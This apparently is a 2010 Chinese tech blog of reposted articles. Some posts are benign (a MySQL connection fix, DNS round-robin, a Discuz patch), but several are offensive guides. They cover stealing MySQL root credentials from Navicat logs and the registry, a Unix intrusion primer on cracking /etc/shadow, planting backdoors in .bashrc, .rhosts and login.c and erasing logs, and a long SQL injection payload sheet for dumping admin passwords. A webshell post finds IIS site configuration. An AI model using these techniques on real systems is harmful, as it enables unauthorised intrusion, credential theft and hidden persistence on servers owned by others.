许诺's Blog - 技术转载

利用navicat提权

251812239@qq.com(许诺) — Wed,28 Jul 2010 23:26:56 +0800

navicat是一个比较流行的MySQL管理工具，在很多服务器上都可以找到
有两个方法提权： .
1、从日志文件里找密码，navicat会把操作日志（比如加账户）保存到My Documents\Navicat\MySQL\logs下的LogHistory.txt，低版本是安装目录下的logs下LogHistory.txt
2、navicat管理的MySQL服务器信息（一般是root帐户）是存在注册表里的，具体是HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers下，导出注册表导入到本机然后星号察看就OK了。。

作者不祥，所以未有版

win2003偶尔出现Can not connect to MySQL server

251812239@qq.com(许诺) — Wed,21 Jul 2010 17:23:44 +0800

这几天有MySQL数据库服务器频繁出现掉线，经排查，并没有受攻击，网上搜索了一下，很多人都碰到这问题，全是Windows系统上安装MySQL，原因是前段时间微软发布的补丁KB967723而导致的。现在有两种解决方法：

第一种：卸载KB967723补丁
登录服务器，进入控制面板 — 添加和删除程序 — （勾选上方的“显示更新”）在里面可以看到更新的KB967723这个补丁，然后就想卸载普通软件一样卸载，卸载中会提示你，如果卸载可能导致程序运行出错，没关系，选择“是”，继续卸载。卸载完成后重启数据库服务器。

第二种：修改注册表
本方法是微软给出的修改注册表修复该Bug的的方法，原因是默认最大的临时 TCP 端口的数是 5000 适用于一节中包含的产品中。在这些产品中添加一个新参数。要提高临时端口的上限，请按照下列步骤操作：

开始 → 运行 → 输入regedit → 启动注册表编辑器。
在注册表中找到以下子项，然后单击参数：
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
在编辑菜单上单击新建，然后添加下面的注册表项：
数值名称： MaxUserPort
值类型: DWORD
值数据： 65534
有效范围： 5000-65534 (十进制)
默认值： 0x1388 (5000 十进制)
说明：此参数将控制程序从系统请求任何可用的用户端口时使用的最大端口数。通常，1024 的值和包含的 5000 之间分配临时的（短) 端口。
退出注册表编辑器，并重新启动计算机。
微软原文链接：http://support.microsoft.com/kb/q196271

现此问题的原因是因为微软2009年发布了TCP/IP更新补丁（KB967723），如果服务器开启自动更新或者有自动更新软件下载更新了这个补丁，那么就会出现这个问题。出现Can not connect to MySQL server错误

Web服务器负载均衡的几种方案 : DNS轮询

251812239@qq.com(许诺) — Sun,18 Jul 2010 23:39:46 +0800

DNS轮询

大多域名注册商都支持多条A记录的解析，其实这就是DNS轮询，DNS 服务器将解析请求按照A记录的顺序，逐一分配到不同的IP上，这样就完成了简单的负载均衡。

优点

基本上无成本，因为往往域名注册商的这种解析都是免费的；
部署方便，除了网络拓扑的简单扩增，新增的Web服务器只要增加一个公网IP即可。

缺点

健康检查，如果某台服务器宕机，DNS服务器是无法知晓的，仍旧会将访问分配到此服务器。修改DNS记录全部生效起码要3-4小时，甚至更久；
分配不均，如果几台Web服务器之间的配置不同，能够承受的压力也就不同，但是DNS解析分配的访问却是均匀分配的。其实DNS也是有分配算法的，可以根据当前连接较少的分配、可以设置Rate权重分配等等，只是目前绝大多数的DNS服务器都不支持；
会话保持，如果是需要身份验证的网站，在不修改软件构架的情况下，这点是比较致命的，因为DNS解析无法将验证用户的访问持久分配到同一服务器。虽然有一定的本地DNS缓存，但是很难保证在用户访问期间，本地DNS不过期，而重新查询服务器并指向新的服务器，那么原服务器保存的用户信息是无法被带到新服务器的，而且可能要求被重新认证身份，来回切换时间长了各台服务器都保存有用户不同的信息，对服务器资源也是一种浪费。

部署方法

这个是万网的域名控制面板，将同一域名解析到2条A记录上。

这个是免费的智能DNS 解析服务，www.dns pod.com，不仅可以多条A记录，而且还能使用中国特色，根据电信、网通、教育网的用户访问，解析到不同的IP上。

实验

先将www.fuckegg.com的A记录解析到x.x.x.x和x.x.x.n上，然后使用nslookup工具查看。
直接用cmd命令nslookup看到解析到了两个IP了

关于DNS 服务器的压力问题，其实并不用太过担心，因为解析记录通常都是有一小时的缓存的，如果用户最近一级的DNS 服务器上的解析记录还未过期的话，是不用查询主服务器的，通常DNS 都有一小时的缓存，所以这样就等于把压力分摊到了各用户最近一级的DNS 服务器上了。

广告联盟的广告加载太慢，影响网页速度解决办法

251812239@qq.com(许诺) — Mon,14 Jun 2010 12:26:26 +0800

第一步：把这个放在广告位置

广告载入中...

第二步：把这段代码放到页底:

http://www.fuckegg.com (这里是广告代码)

入侵Unix操作系统基础知识

251812239@qq.com(许诺) — Thu,06 May 2010 07:50:16 +0800

如果我们要入侵Unix操作系统，首先我们要对Unix操作系统很了解，对入侵的一些基础知识也要懂得如何运用。下面，我们就来给大家讲解一下入侵Unix操作系所需要知道的一些基础知识。Unix操作系统的一些基础知识：
1.Unix操作系统具有如下特点：
Unix操作系统分级树形文件结构、文件、目录表和外部设备作为文件统一管理、提供功能完备的命令程序语言"Shell语言"、提供了各种程序设计语言和大量的程序设计子系统、系统核心和外部程序大部分采用Ｃ语言编写、采用进程映像对换技术、系统效率高。
2.主流Unix操作系统及制造商：
386BSD----------------Internet免费
AIX------------------IBM
A/UX------------------Apple
BSD-------------------Univ.of Califonia ar Berkeley
FreeBSD-----------------Internet 免费
HP-UX------------------HP
UNIXWare----------------Novell
SunOS------------------Sun Microsystems
UNIX System V--------------AT&T
Solaris------------------Sun Microsystems
3.基础Unix操作系统指令：
下边是Unix操作系统指令和MS-DOS指令的一个对比，相信我不用多说，使用过DOS的
朋友，都能够进行一些基本的操作了！
[pre]
CD = cd
CD.. = cd..   DIR/W = ls
DIR = ls -l   DIR/AH = ls -al AH=(hidden) -al=(include hidden files as well
as regular)   RENAME = mv
ATTRIB = chmod   MD = mkdir
RD = rmdir   DEL = rm
COPY = cp
[/pre]4.一些对入侵Unix操作系统可能有帮助的指令及文件：
命令：uname -a
用途：显示系统版本
对入侵者的用途：了解系统版本情况，对症小药。
命令：ps
用途：查看系统进程
对入侵者的用途：比如查看到ROOT启动了HTTPD，而WEB目录又任意用户可写的话，那本地用户可以写一个CGI，以ROOT的身份来调用系统命令，发达啦！
命令：w
用途：查看当前系统中的用户及其正在操作的命令对入侵者的用途：看看是不是有其它人在系统上呀，如果有就最好别下手了
命令：su
用途：改变当前用户在系统中的身份
对入侵者的用途：su root，不用说了吧！
命令：ln
用途：建立文件连接
对入侵者的用途：我前天发现了SunOS的一个文件链接漏洞，可以通过ln命令来改变文件的属主，属性，内容：）
命令：rlogin
用法：rlogin -l username hostname
用途：远程登陆其它主机
对入侵者的用途：我们可以用它在登陆到其它的主机上，就是所谓的跳板吧！
命令：gcc
用法：gcc rootshell.c -o rootshell
用途：编译Ｃ程序
对入侵者的用途：不用我说了吧！
文件：$HOME/.histroy
用途：历史记录文件
对入侵者的用途：用来记录你的命令，当然也可能是别人的命令，有两个作用如果这个系统已经被别人入侵了，而且是使用你这个用户名进行的，呵呵，看看history说不定能帮你找到他留下的后门，第二点是你成功获得ROOT后，一定要清除这个文件哦。
文件：.bashrc
用途：Bash Shell的个性化配置文件
对入侵者的用途：这个文件在启动Bash Shell的时候运行，它可以包含任何合法的命令及复杂的脚本指令，你想想在root的目录中放个这会有什么好处？（每一种Shell都有这样的文件哦）
文件：/etc/passwd
用途：用户密码文件
对入侵者的用途：看看系统有那些用户也好呀，或者当下来配合下边要提到的shadow进行密码破解也是一种办法哦。
文件：/etc/shadow
用途：用户密码文件
对入侵这的用途：其实用户真正的密码是在这里，如果可以的话把它和
/etc/passwd一起下载到本地，然后john跑用户密码
文件：/etc/inetd.conf
用途：系统配置文件
对入侵者的用途：more /etc/indtd.conf看看系统到底开放了那些服务。当然我们也可以利用它做后门，这以后再谈。
文件：.rhosts
用途：rlogin和rsh通过它做简单的认证
对入侵者的用途："+ +"的后门你一定听说过吧？
文件：login.c
用途：用户登陆程序的源代码
对入侵者的用途：修改源代码，放个后门在里边。
文件：wtmp，utmp，message,lastlog
用途：日志文件
对入侵者的用途：清除你在系统中留下的影子
入侵Unix操作系统之前，我们要有足够的准备，因为Unix操作系统的安全性很强，所以学习好基础知识很重要。

注入语句

251812239@qq.com(许诺) — Tue,23 Feb 2010 22:31:28 +0800

转自华夏。残鑫总结

注意：对于普通的get注入，如果是字符型，前加' 后加 and ''='

拆半法

######################################
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库，MSysAccessObjects是ACCESS的默认表。

and exists (select * from admin)
and exists(select id from admin)
and exists(select id from admin where id=1)
and exists(select id from admin where id>1)
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
and exists (select username from admin)
and exists (select password from admin)
and exists (select id from admin where len(username)<10 and id=1)
and exists (select id from admin where len(username)>5 and id=1)
and exists (select id from admin where len(username)=6 and id=1)
and exists (select id from admin where len(password)<10 and id=1)
and exists (select id from admin where len(password)>5 and id=1)
and exists (select id from admin where len(password)=7 and id=1)
and (select top 1 asc(mid(username,1,1)) from admin)=97
返回了正常，说明第一username里的第一位内容是ASC码的97，也就是a。
猜第二位把username,1,1改成username,2,1就可以了。
猜密码把username改成password就OK了
##################################################

搜索型注入
##################################

%' and 1=1 and '%'='
%' and exists (select * from admin) and '%'='
%' and exists(select id from admin where id=1) and '%'='
%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='

这里也说明一下，搜索型注入也无他，前加%' 后加 and '%'='
对于MSSQL数据库，后面可以吧 and '%'='换成--
还有一点搜索型注入也可以使用union语句。
########################################################

联合查询。
#####################################

order by 10
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1

很简单。有一点要说明一下，where id=1 这个是爆ID=1的管理员的时候，where id=1就是爆ID=2的管理用的，一般不加where id=1这个限制语句，应该是爆的最前面的管理员吧！（注意，管理的id是多少可不一定哈,说不定是100呢！）

###################################

cookie注入

###############################

http://www.******.com/shownews.asp?id=127
http://www.******.com/shownews.asp
alert(="id="+escape("127"));
alert(="id="+escape("127 and 1=1"));
alert(="id="+escape("127 order by 10"));
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));

这些东西应该都不用解释了吧，给出语句就行了吧。这里还是用个联合查询，你把它换成拆半也一样，不过不太适合正常人使用，因为曾经有人这样累死过。
###################################

偏移注入

###########################################################

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)

union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on

a.id=d.id)

and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)

and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)

cain出现应用程序错误

251812239@qq.com(许诺) — Tue,23 Feb 2010 12:26:38 +0800

cain安装成功，但是无法启动的情况　提示　应用程序初始化(0xc00000222)失败，请单击确定，终止此应用程序，这并不是因为中毒了，或者杀软什么的，而是因为系统的c:\windows\system32\npstools.dll文件被替换了(可能有的系统为了安全故意替换的，包括netfuke没有这文件也是没法启动的)，只要用正确的npstools.dll替换到c:\windows\system32目录就可以了(如果c:\windows\system32\dllcache也有此文件，要先替换这个目录的)．如果有ntfs权限问题，要做出相应的设置(具体的可以参考视频教程。

　　还有些情况，是winpcap安装不成功的，也是因为系统文件被替换了，或者做了相应的权限设置，主要有
　　Packet.dll，WanPacket.dll，wpcap.dll,pthreadVC.dll,npf.sys 。

cmd下查看服务器iis域名信息

251812239@qq.com(许诺) — Fri,29 Jan 2010 21:30:57 +0800

Set ObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
sServerName=Obj3w.ServerComment
Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root")
ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ") & obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf

End If
Next
WScript.Echo ListAllWeb
Set ObjService=Nothing
WScript.Quit

保存成*.vbs

执行cscript *.vbs

DZ 7.1 7.2 针对getshell的修复方法

251812239@qq.com(许诺) — Wed,06 Jan 2010 17:18:13 +0800

在common.inc.php上面加上
$response=$scriptlang=array();

这个洞t00ls团队发现的

webshell下查找IIS的站点配置信息

251812239@qq.com(许诺) — Sun,03 Jan 2010 10:58:41 +0800

默认IIS站点配置文件有2个MBSchema.xm和MetaBase.xml,路径是C:\WINDOWS\system32\inetsrv\(一般这个目录设置的everyone读的权限.)

MetaBase.xml这个文件是存的站点IIS配置的信息.里面可以查到所有本服务器IIS下设置的站点目录和配置。

几个主要的配置有:

ServerComment:我的网站 //站点的名称
ServerBindings:80 //站点的端口
Path="D:\wwwroot" //这里是站点的路径
DefaultDoc="index.asp,index.php,index.htm,Default.htm,Default.asp,Default.aspx" //默认文档头,就是主页显示文件名
ScriptMaps==".asa,C:\WINDOWS\syst..........." //站点支持的哪些脚本.

还有就是看C:\WINDOWS\system32\inetsrv\History这个目录,这个目录里是对每次站点的IIS设置进行的备份.

但这些都涉及到权限问题，如果权限默认设置严格就访问不了了。